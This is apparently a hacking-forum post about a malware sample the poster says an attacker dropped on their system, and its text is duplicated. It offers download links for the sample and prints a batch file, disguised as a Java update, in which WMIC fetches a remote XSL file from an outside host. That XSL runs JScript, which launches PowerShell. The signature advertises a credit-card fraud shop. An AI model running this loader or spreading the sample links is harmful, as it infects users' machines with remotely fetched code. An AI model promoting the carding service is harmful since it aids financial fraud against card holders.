Found this files been dropped silently to my system by an attacker.
Download:
https://www.uploadadz.com/gwhnvyaj4mus
Download 2:
https://dropbbase.com/download/6420204a2...63dc9.html
Virus Scan:
https://www.virustotal.com/#/file/c3d0c5.../detection
initializer.xsl (11/56)
https://www.virustotal.com/#/file/72d4e9.../detection
By reading the virus report it can easily check that the xls launches Powershell.exe
JavaUpdate-242799.bat
By reading the code it can easily be checked that WMI Commandline Utility gets initializer.xls file.
The xls file is XML/JScript language.
Malicious site last checked: 20:33 08/01/2019
Download:
https://www.uploadadz.com/gwhnvyaj4mus
Download 2:
https://dropbbase.com/download/6420204a2...63dc9.html
Virus Scan:
https://www.virustotal.com/#/file/c3d0c5.../detection
initializer.xsl (11/56)
https://www.virustotal.com/#/file/72d4e9.../detection
By reading the virus report it can easily check that the xls launches Powershell.exe
JavaUpdate-242799.bat
Code:
@echo off
%SystemRoot%\system32\cmd.exe /k start /MIN %SystemRoot%\system32\wbem\WMIC.exe os get /format:"http://EGPHVcRtPL.blessedsite.com/10/initializer.xsl?QDUzTUH25w8ZVTs2FGPFpwhWjhZav8" && exitBy reading the code it can easily be checked that WMI Commandline Utility gets initializer.xls file.
The xls file is XML/JScript language.
Malicious site last checked: 20:33 08/01/2019
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
The House Of Credit Card - Findsome.ru